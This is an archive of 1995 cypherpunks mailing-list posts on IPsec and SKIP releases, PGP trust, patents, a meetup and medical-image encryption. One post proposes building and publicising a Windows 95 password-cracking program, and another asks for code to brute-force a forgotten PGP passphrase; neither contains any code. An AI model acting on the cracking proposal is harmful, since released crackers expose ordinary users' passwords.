> >4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
> >pretty portable to other similar Berkeley based machines.
> 
> What licensing requirements exist for people who might want to 
> use this code in their products? In particular, does one need to 
> obtain any licensing from RSA or Cylink? 

No. It doesn't contain any public key stuff because it isn't the key
management component.

Its all available under a Berkeley style license, which permits
unrestricted commercial use, and complies with RFC 1825, 1826, 1827,
1828 & 1829.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Thu, 30 Nov 1995 03:48:27 +0800
To: cypherpunks@toad.com
Subject: San Diego Cpunks Physical Meeting
Message-ID: <9511291918.AA11333@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, December 7, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  Get the latest update of Lance Cottrell's anonymous
e-mail server, "mixmaster", exchange keys, and discuss other topical
subjects.  If you are in to what's happening on the list, encryption,
privacy, The Mission is the pace to be.

   Don't forget to bring your public key  fingerprint and forms of
identification.  If you can figure out how to get it on the back of a
business card, that would be cool.  

   Drop me a note if you plan to attend.

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and Garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 01:04:48 +0800
To: jamesd@echeque.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511290707.XAA24211@blob.best.net>
Message-ID: <9511291629.AA28948@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 23:05:29 -0800
>From: "James A. Donald" <jamesd@echeque.com>
>
>At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
>> Of course.  This isn't the base case.  We would have some keys which I sign
>> based on my own personal knowledge; things handed to me by people I know;
>> some possibly published in the paper where the real key owner would see the
>> claim and be able to contest it.
>
>You are making the same erroneous assumption that Phil made when he
>designed the Web of trust:  You assume that it is important and 
>interesting to link key ID's to physical bodies.  

Thanks for that reminder.  I am actually not bound to the notion of keys
being only for people.  I'm a defender of the rights of disembodied
processes from way back :-).  However, this particular discussion was
focussed on people.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyKOVQXJENzYr45AQEzdAP/WcAaOE8RsxvNCnY0MBY0aqVboWPKU7aj
toairhNM7i5J+vacN30tBefU51+gmhQIdP3jRuArbSr0+xdrtNqiWBAiYaxiZz4X
g2/nUui2uaPuXF0tdXlN4ILSJQ0QV42mppOBXWjimcWXRioSQVBGxGS7X1tsPF+/
5AvEQha4h4I=
=MVIQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 30 Nov 1995 04:31:19 +0800
To: cypherpunks@toad.com
Subject: Whitehouse PROFS email privacy case
Message-ID: <199511291931.LAA02934@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


this was a hot subject a long time ago on the list, here's a book
with the scoop


------- Forwarded Message
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: PROFS Case: Book on White House e-mail

Date: Wed, 22 Nov 1995 12:50:49 -0500 (EST)
From: Eddie Becker <ebecker@cni.org>
Subject: PROFS Case: Book on White House e-mail

  NEW BOOK PROVIDES NARRATIVE ON PROFS CASE
  ALONG WITH REMARKABLE PRIMARY DOCUMENTS.
  Following Press Release    11/22/96
  REVELATIONS FROM --WHITE HOUSE E-MAIL: THE 
  TOP SECRET COMPUTER MESSAGES THE 
  REAGAN/BUSH WHITE HOUSE TRIED TO DESTROY, 
  Edited by Tom Blanton (New York: The New Press, 256 pp. 
  plus 1.44 megabyte computer disk), distributed by W.W. Norton 
  & Company.
  For more information, contact: Tom Blanton (o) 202/994-7000, 
  (h) 301/718-6543, nsarchiv@gwis2.circ.gwu.edu
  SECRET SUPPORT FOR SADDAM HUSSEIN
  Top Reagan administration officials, including Colin Powell, 
  presided over covert intelligence support to Saddam Hussein 
  during the Iran-Iraq War, including targeting information on 
  Iranian civilian infrastructure for Saddam's SCUD missiles.  In 
  secret e-mail messages, National Security Council staffer William 
  Cockell recommended -- and Deputy National Security Adviser 
  Alton Keel agreed -- they cover-up the assistance to Saddam, 
  because "it is difficult to characterize this as defensive assistance." 
  [pp. 36-41]  Subsequently, while Powell served as Deputy 
  National Security Adviser in 1987, the Reagan administration 
  discussed a "shopping list" of pro-Iraq actions in order to "stiffen 
  them up." [pp.235-237]
  HELPING NORIEGA "CLEAN UP HIS IMAGE"
  Three months after Seymour Hersh and The New York Times 
  exposed Manuel Noriega's involvement in drugrunning and 
  murder, Noriega approached the National Security Council staff 
  with an offer to assassinate the Nicaraguan Sandinista leadership.  
  Oliver North relayed the offer to his boss, National Security 
  Adviser John Poindexter, writing that "you will recall that over the 
  years Manuel Noriega in Panama and I have developed a fairly 
  good relationship."  Poindexter replies, "I have nothing against him 
  other than his illegal activities" and approves a North meeting with 
  Noriega -- as does Secretary of State George Shultz.  The 
  bottom line?  The White House agrees to help Noriega "clean up 
  his image" in return for Panamanian sabotage operations against 
  the Nicaraguan Sandinistas. [pp. 23-25]
  THE WHITE HOUSE SENDS A COCAINE CONSPIRATOR 
  TO CLUB FED
  Top Reagan administration officials from the White House, 
  Pentagon, and Justice Department just said yes to a reduced 
  prison sentence (in a minimum security facility) for a Honduran 
  colonel and sometime CIA asset who was convicted of cocaine 
  trafficking and conspiracy to assassinate the civilian president of 
  Honduras, because otherwise the colonel might "start singing 
  songs nobody wants to hear" about covert operations in 
  Honduras.  [pp. 42-48]
  SECRET DEALS WITH LOBBYISTS ON A 
  CONTROVERSIAL CONGRESSIONAL VOTE
  The White House struck a secret deal with the American Israel 
  Public Affairs Committee in the spring of 1986 to avoid an 
  AWACS-style all-out battle on a Saudi arms deal vote, and in 
  return got AIPAC's help on foreign aid funding and on the Iran-
  contra scandal.  But National Security Council staffer Howard 
  Teicher warned, "whatever one may think of the jewish 
  leadership, the 'masses' are rarely if ever swayed by what the 
  rational, reasonable leaders say.  instead, it is the israel right or 
  wrong demagogues at the grassroots level that will try to take 
  advantage of the leadership's pusillanimity."  [pp. 150-157]
  HIDDEN FAILURES OF THE POLYGRAPH 
  (PRECURSORS OF ALDRICH AMES)
  According to the National Security Council's top 
  counterintelligence official in 1985, career FBI agent David 
  Major, two out of the 48 individuals indicted, arrested and/or 
  convicted of espionage against the U.S. in the years 1975-85, 
  had successfully deceived the CIA's favorite screening tool, the 
  polygraph (lie detector) -- a 4% error rate.  (Aldrich Ames 
  subsequently beat the polygraph twice.)  [p.220]
  ROSS PEROT'S EGO RIDES AGAIN
  Ross Perot "sandbagged" the Reagan White House at a 1986 
  Congressional hearing on the POW-MIA issue, according to the 
  lead White House staffer on the issue, Col. Richard Childress, 
  who also wrote, "he has played into Hanoi's hands for his ego and 
  doesn't even know it."  [p. 162]
  MORE WHITE HOUSE E-MAIL STORIES
  * Then-Israeli Defense Minister Yitzhak Rabin personally 
  arranged with Oliver North for secret shipments of captured PLO 
  weapons to Central America in September 1986, with the 
  approval of the National Security Adviser.  Rabin also 
  commented, according to North's e-mail, "at some length about 
  his low opinion of our intel service [CIA] - both in terms of 
  coverts ops and intelligence collecting," and promised "no more 
  Pollards."  [pp. 119-122]
  * The regular breakfast meetings in the Reagan administration of 
  the National Security Adviser, the Secretary of State (George 
  Shultz), and the Secretary of Defense (Caspar Weinberger) often 
  degenerated into what staffers called "slugfests."  p. 193
  * Contrary to claims in a recent autobiography, National Security 
  Adviser Robert McFarlane did not anticipate the collapse of the 
  Soviet Union and craft U.S. policy accordingly to pressure the 
  Soviets, rather, in his 1984 e-mail, McFarlane wrote "it will not 
  change ideologically and therefore our task is to establish a basis 
  for peaceful competition with them."  p.189
  * At the behest of Israeli Prime Minister Shimon Peres, Vice 
  President George Bush proposed a "7-point peace plan" during a 
  Middle East trip in 1986, only to have it shot down by White 
  House and State Department opposition back in Washington.  p. 
  200
  * While serving as Deputy National Security Adviser to President 
  Reagan in 1987, Colin Powell lived in an alarmed house at Fort 
  McNair which "scared hell out of the family initially and then 
  became amusing when the MPs assaulted the house every time 
  the alarm misfired."  p. 211
  * White House staffers joked about CIA Director William 
  Casey's renowned "mumbles," writing, "The last time he told 
  Goldwater we were going to 'lay some mines in Nicaragua,' 
  Goldwater thought he said we were going to 'pay some fines for 
  some joggers.'"  p. 214
                                        END     


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 01:07:15 +0800
To: frantz@netcom.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511290808.AAA14767@netcom2.netcom.com>
Message-ID: <9511291640.AA00683@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 00:10:16 -0800
>From: frantz@netcom.com (Bill Frantz)

>It is hard to see how to record the information about how much I trust the
>receipent's systems security.

I don't see a computer-understandable way to do that either -- but you have
provided an example of a human-readable way in your prior paragraph:

>			     I just added a key to my key ring that I will
>use for sending confidental data to a client site.  I trust that no one can
>access the secret key who is not also inside their firewall.  However, the
>key is on a multi-user system, so I do not trust that it is accessable to
>only one person.  Since the data I intend to send will be publicly
>available inside the firewall, I don't have to trust more than the
>firewall.

You could sign a small message consisting of:

	a) that paragraph
	b) the subject public key (or its good-enough hash)
	c) your public key (or its good-enough hash)

with your key and let that attribute declaration do the job.  It would only
be humans who could interpret it, but in the end it's humans who need to.
The computer should be able to find and use (b) and (c) -- but leave the
human to interpret (a).

I grant that they'd rather let the machine do the thinking for them, but
that may not be possible -- especially at this time in the evolution of
generally available security, before we learn patterns to codify in
computer-understandable abbreviations.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyM7FQXJENzYr45AQGErQP/QlElHIH2/tqbWtUR+hTyRUgTTEAsq18O
c9XbJ3OK+HW4WOmsxBQKgqx+/C0zsboo088rkqahG2UNLbC91iizVuAlU5zZth19
F49AAfCrnqDPMyBr+3VecAnHxj09AK5GeHiLQqepHvuyh0IN3hq44zKmeHkV3PHO
b8fPQ3tTJCk=
=K2WN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 30 Nov 1995 05:03:55 +0800
To: cypherpunks@toad.com
Subject: break microsoft!!!
Message-ID: <199511291949.LAA04349@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


re: the recent message that windows 95 has weak password encryption
due to a 32 bit random seed sent to RC4--

this seems like another EXCELLENT opportunity for some major 
cypherpunks press coverage and feather-in-the-cap accolades.

remember, the last break of the Netscape RC4 algorithm (or was it
MD5?) got front page NYT coverage and reverberated throughout the
entire media.

a "cypherpunk" accomplishing the same thing for Microsoft would 
potentially get *major* notice.

I imagine a short .exe file that when run on the proper computer
prints out passwords as it cracks them. this would get the
attention of a LOT of people.


I have the MS C++ compiler, and if someone could discuss the difficulty
of writing this proposed "exe" file, the rough time required to break
the keys, and other considerations (physical access to server computer
required?)  and maybe point to code pieces on the
net (RC4 etc.) to pull it off, I might start the effort myself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 30 Nov 1995 03:18:45 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <m0tKrau-00090tC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I ahve security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>PGP is really not the issue.  The issue is more my security and the
>environment that I use PGP in.  I don't have a trusted machine to run PGP
>on.  Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in. 
>
>So, I don't fool myself, and I don't use PGP, except for things like
>exchanging a one-time pad with someone when I've already sent the message
>out across another delivery mechanism, like on a floppy delivered my
>courier. 
>
>Alice de 'nonymous ...

You're a bonehead.  On the one hand, you FAIL to stop or dramatically reduce
claimed spoofings of your notes by using PGP (which would almost certainly
work perfectly for this limited purpose) yet you claim that you'll only
trust PGP in a limited scenario of courier-delivered data!

Talk about "penny-wise and pound foolish"!  

Wake up, idiot!  The purpose of encryption and signing and such is to REDUCE
problems, ideally to zero but if not to some adequately small value.  To
fail to use signing when there is no ongoing problem is risky; to not use
signing when there is a  serious continuing problem is downright lunatic.
That sets up an irresolvable contradiction:  On the one hand, you're willing
to tolerate a continuing problem, yet on the other you claim that your
standards are so high that you won't use a system unless the probability of
security essentially precludes a loss of security.

Now can you see why we're laughing?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 30 Nov 1995 05:13:16 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199511292001.MAA16554@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:30 PM 11/28/95 EST, Carl Ellison <cme@TIS.COM> wrote:

>BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
>is that I trust that key (by personal meeting, by attribution, by message
>association, ...).  A signed attribute record would let me record that
>information for myself as well as for others.

That would be a useful feature, even if it's just an unstructured text file.
There is a way to do it now, though it's inefficient and hokey -
create multiple key-signing keys, with name fields indicating the attribute,
sign them with your main key, and use the appropriate one of them to
sign keys for people.  For instance, I have a key named
"Bill Stewart Unauthenticated Pseudonym Signing Key <stewarts@ix.netcom.com>"
which I use to sign keys of significantly lower trust than my normal key;
you could do similar things for higher-quality certification.
This does increase the depth of the web-of-trust required, which is less
of a problem for low-trust keys than for keys you actually care about :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 30 Nov 1995 05:17:59 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Elliptic curves, patent status?
In-Reply-To: <199511290717.XAA29808@blob.best.net>
Message-ID: <Pine.SUN.3.91.951129120448.15920A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, James A. Donald wrote:

> > [are there patents that cover all public key cryptography?]
>
> No, but RSA will litigate you with the objective of
> inflicting extravagant legal costs regardless.

RSADSI no longer owns the Stanford patents (Hellman-Merkel, 
Diffie-Hellman) which they used to claim covered all public key 
cryptography.  Those patents now belong to Cylink, who seems to be less 
litigious.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Thu, 30 Nov 1995 07:31:22 +0800
To: cypherpunks@toad.com
Subject: Question on modular exponents
Message-ID: <230*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi CP's:

I'd be pleased if someone explained me this ASAP:

How could I demonstrate that _ (g^a)^b (mod p) = g^{(a*b) mod q} mod p _
when g's order in Zp is q?

The same question remains for adition. I have the feeling the demonstration
must be similar.

Best.

Jaime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Barrett/CheckFree Corporation <Andrew_Barrett@checkfree.com>
Date: Thu, 30 Nov 1995 01:52:28 +0800
To: www-buyinfo <cypherpunks@toad.com>
Subject: Re: (cpx) Re:(fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <9511292039.AA0442@6thstreetcheckfree.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky writes (quoting propaganda forwarded to Punks by Robert):

>>  WebTrader can be used as a stand-alone Internet application or in
>>conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
>>suggested retail price of $1,295.
                           ^^^^^^^^^^^^^^^^

>They can't be serious. Why would you want to pay $1,300 for a payment
>system, when you can get an Ecash merchant account for a fraction of what
>Checkfree is charging?

Not all merchants wishing to transact on the Web are as knowledgeable or 
sophisticated as the Punks on the different options. The offering includes a 
Web presence and payment processing, hassle free. No energy expenditure 
required. No need to develop an instant competency in electronic commerce. If a 
prospective web merchant has neither in place, I imagine the cost might be 
attractive. I also imagine that, like any other business in the world, SBT 
charges what they think the market will bear.

Please note that CheckFree did not price the offering - they do the CC 
processing for SBT at some agreed upon cost to SBT. SBT sets the price for the 
offering in order to recover that cost, as well as their own, and establish 
some sort of margin.

And by the way, I had nothing to do with project, so I beg you not to direct 
flames thisaway, should any decide flames are called for. Hey man, I just work 
here....  :)

AJ.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 01:56:52 +0800
To: ipsec@ans.net
Subject: NRL IPsec/IPv6 code
Message-ID: <199511291742.MAA03253@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



An early version of NRL's 4.4BSDlite based IPsec/IPv6 implementation
is up on ftp.c2.org in an appropriately export controlled directory.

This isn't an official distribution -- I'm just putting up the code I
got because there has been some interest in it. I've been hacking it
in to NetBSD of late.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 30 Nov 1995 05:29:43 +0800
To: cypherpunks@toad.com
Subject: Code to brute-force PGP passphrase?
Message-ID: <Pine.ULT.3.91.951129123917.17268A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have an old, forgotten PGP key for which I would like to issue a
revocation certificate (or maybe I stole somebody else's with an identical
name; who could tell?). I can put the key on a Mac, PC, or UNIX machine
(various flavors). I think I have a pretty good idea what the middle of
the passphrase contains, so I'd guess there are only about 2,000
possibilities to be explored. 

Anybody have code for any platform for cracking this? Alternatively, I
could just give you the key and wait for the answer. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLzGmI3DXUbM57SdAQE8NAP9EKVkxVzsTPHQ0NcJJgU4aor8BQbjN2a5
OqNAkpeNoZOcn5NcqGBMjI6mVQbgVjnzDOdoDWngGmWbtruFcFjE1IM8iK/wScah
Caqo7SuKQqUMXB8mAC5pVYmdavJrOX4WPcl6nT2MkJTvnJe7YgiCMWIdm+4XCPZ/
YybyYhWf7XA=
=W5H8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 30 Nov 1995 03:29:47 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
In-Reply-To: <199511291534.KAA02780@jekyll.piermont.com>
Message-ID: <doug-9510291859.AA029810760@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry sez:

>
>Tom Markson writes:
>> Check out http://skip.incog.com.  We've released the source to the SKIP
>> key management and IP layer encryption package for SunOs 4.x.
>
>SKIP is a non-standard being pushed by Sun.
>

Correct me if I'm wrong, but isn't sun trying to make it a standard
(in competetion with Photuris) ?

Can I also assume that the IPV6 stuff requires pretty extensive kernel
mods? (Not bad, but a very definite consideration)

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 30 Nov 1995 02:56:06 +0800
To: Joey Grasty X3697 P6611 <jgrasty@pts.mot.com>
Subject: Re: Judge won't drop Netcom from suit
In-Reply-To: <30BA3798.2781E494@pts.mot.com>
Message-ID: <9511291823.AA26757@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The article looks like it was written from the scoentologists press release.
The judgement was posted in alt.religion.scientology. The actual judgement was 
far from a success for the scientologists. 

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 30 Nov 1995 06:01:10 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: break microsoft!!!
In-Reply-To: <199511291949.LAA04349@netcom13.netcom.com>
Message-ID: <Pine.ULT.3.91.951129132555.17268F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Be careful not to sound too gleeful, lest you play into the evil nasty 
hacker stereotype. Keep the focus on the fact that real encryption is 
both possible and highly desired; the bad guys are lazy programmers and 
the US Government.

I have sent a pointer to the sci.crypt article to the win95netbugs list, 
which currently has eight Microsoft employees and nine major computer 
magazines on it. I might mention it to Microsoft's "technical people" 
when they drop by next week to address our networking concerns.

The answer, for anyone desiring one, is to turn off Win95's "multiple 
user profiles" features, turn off "encrypted password caching," and 
advertise the fact that Win95 is a totally insecure single-user OS, and 
will continue to be so as long as it uses the 1970's-vintage FAT file 
system. If real security is not available, the goal should be to 
eliminate the false sense of security that encourages people to leave 
sensitive files out in the open.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 30 Nov 1995 04:34:44 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
In-Reply-To: <199511291926.OAA03467@jekyll.piermont.com>
Message-ID: <doug-9510291935.AA029910760@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>
>Doug Hughes writes:
>> >Tom Markson writes:
>> >> Check out http://skip.incog.com.  We've released the source to the SKIP
>> >> key management and IP layer encryption package for SunOs 4.x.
>> >
>> >SKIP is a non-standard being pushed by Sun.
>> 
>> Correct me if I'm wrong, but isn't sun trying to make it a standard
>> (in competetion with Photuris) ?
>
>The IETF has many sorts of standards. It explicitly has a way to
>standardize things that the IETF doesn't think are a good idea but
>which should have the ability to interoperate if you do them.
>
>My opinion is that it is fairly clear that Photuris is the key
>management system people will be using, although it is going to have
>to evolve to work with a real network wide certificate database
>infrastructure. SKIP isn't going to be the standard.
>
>> Can I also assume that the IPV6 stuff requires pretty extensive kernel
>> mods? (Not bad, but a very definite consideration)
>
>IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help
>it. Its part of the IP stack, you know.
>
I knew it was a safe assumption. :)

>BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- its also usable
>in IPv4. We were careful about how we architected that.
>
>The NRL code implements IPsec for both v4 and for the v6 stack it
>comes with. In fact, the NRL code is primarily an IPv6 implementation
>-- they just implemented IPSEC as a side effect.
>

'Tis a shame, because SKIP is available right now and will, if past history
is any indication, become the defacto standard on Sun platforms because it
is readily available, and the IPV6 stuff isn't, nor probably will be soon
because even those with the source code are not permitted to give out mods
to this source (in the case of SunOS - I believe). However, a loadable
kernel module would be very nice with the IPv6 stuff in it. Unfortunately,
I have very little experience with loadable kernel modules of this scope,
nor the source code to use as a reference, should the loadable modules be
feasible.


--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 03:05:49 +0800
To: cypherpunks@toad.com
Subject: Medical Records
Message-ID: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's something that may make attempts such as Clipper a bit harder to
mandate, if this (non-escrowed, I believe) system becomes common. It should
also provide some pressure for relaxation of ITAR.
	-Allen

      (c) 1995 Copyright Nando.net
      (c) 1995 Reuter Information Service
      
[...]

   A security system developed at the University of California at San
   Francisco prevents unauthorized access to x-rays and other medical
   images transmitted via computer networks. A scientist described the
   system in a report prepared for a radiologists' convention here.

[...]
   
   Stephen Wong, assistant professor of radiology and bioengineering, and
   colleagues developed the system for the picture archiving and
   communications system used at the university to store and transmit
   digitized medical images.
   
   He said the authenticity of the images as well as patient
   confidentiality must be protected.
   
   "We have to make sure that the digital information and images are not
   altered accidentally or surreptitiously," Wong said. "In addition,
   x-rays and other imaging studies are part of the patient's medical
   record and must be protected from unauthorized access."
   
   The system uses mathematical formulas or codes to scramble the images
   through encryption. It involves a "two-key" system -- one code enables
   public access but a second, private code is required to unscramble the
   information.
   
   The private code, known only to the individual to whom the information
   is transmitted, is 1,024 computer bits long, Wong said.
   
   In emergencies where fast transmission is needed, the unscrambled
   image is transmitted with a digital "fingerprint," a smaller code that
   assures the intended viewer that no one has altered the original
   image.
   
   Wong prepared his report for the annual meeting of the Radiological
   Society of North America.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 03:07:04 +0800
To: cypherpunks@toad.com
Subject: Harbinger (sp?) system
Message-ID: <01HY7U5HY1WK8WYVEV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Sorry if this question has been asked and I missed it, but does anyone
know how their system works?
	Thanks,
	-Allen


      (c) 1995 Copyright Nando.net
      (c) 1995 Cox News Service
      
   ATLANTA (Nov 29, 1995 - 09:44 EST) -- Harbinger Corp. has announced
   new software aimed at making the Internet safe for commerce, a move
   that could dramatically reshape the small company.

[...]

   TrustedLink, the product announced Tuesday but not available until
   next year, will let firms connect via the Net as well as through
   Harbinger networks, he said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 03:31:34 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Medical Records
In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
Message-ID: <199511291909.OAA16016@homeport.org>
MIME-Version: 1.0
Content-Type: text


	It seems that they use signatures & hashes; nice work, a good
advance for medical records storage, but I'd ask how keys are managed,
and also what prevents me exploiting the 'hash-only' mode of sending
in what I'm cliaming to be is an emergency.  (Not that these
invalidate the system; they're just interesting areas to work on.)

E. ALLEN SMITH wrote:

|    "We have to make sure that the digital information and images are not
|    altered accidentally or surreptitiously," Wong said. "In addition,
|    x-rays and other imaging studies are part of the patient's medical
|    record and must be protected from unauthorized access."
|    
|    The system uses mathematical formulas or codes to scramble the images
|    through encryption. It involves a "two-key" system -- one code enables
|    public access but a second, private code is required to unscramble the
|    information.
|    
|    The private code, known only to the individual to whom the information
|    is transmitted, is 1,024 computer bits long, Wong said.
|    
|    In emergencies where fast transmission is needed, the unscrambled
|    image is transmitted with a digital "fingerprint," a smaller code that
|    assures the intended viewer that no one has altered the original
|    image.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 04:18:32 +0800
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: SKIP Source Release is out!
In-Reply-To: <doug-9510291859.AA029810760@netman.eng.auburn.edu>
Message-ID: <199511291926.OAA03467@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> >Tom Markson writes:
> >> Check out http://skip.incog.com.  We've released the source to the SKIP
> >> key management and IP layer encryption package for SunOs 4.x.
> >
> >SKIP is a non-standard being pushed by Sun.
> 
> Correct me if I'm wrong, but isn't sun trying to make it a standard
> (in competetion with Photuris) ?

The IETF has many sorts of standards. It explicitly has a way to
standardize things that the IETF doesn't think are a good idea but
which should have the ability to interoperate if you do them.

My opinion is that it is fairly clear that Photuris is the key
management system people will be using, although it is going to have
to evolve to work with a real network wide certificate database
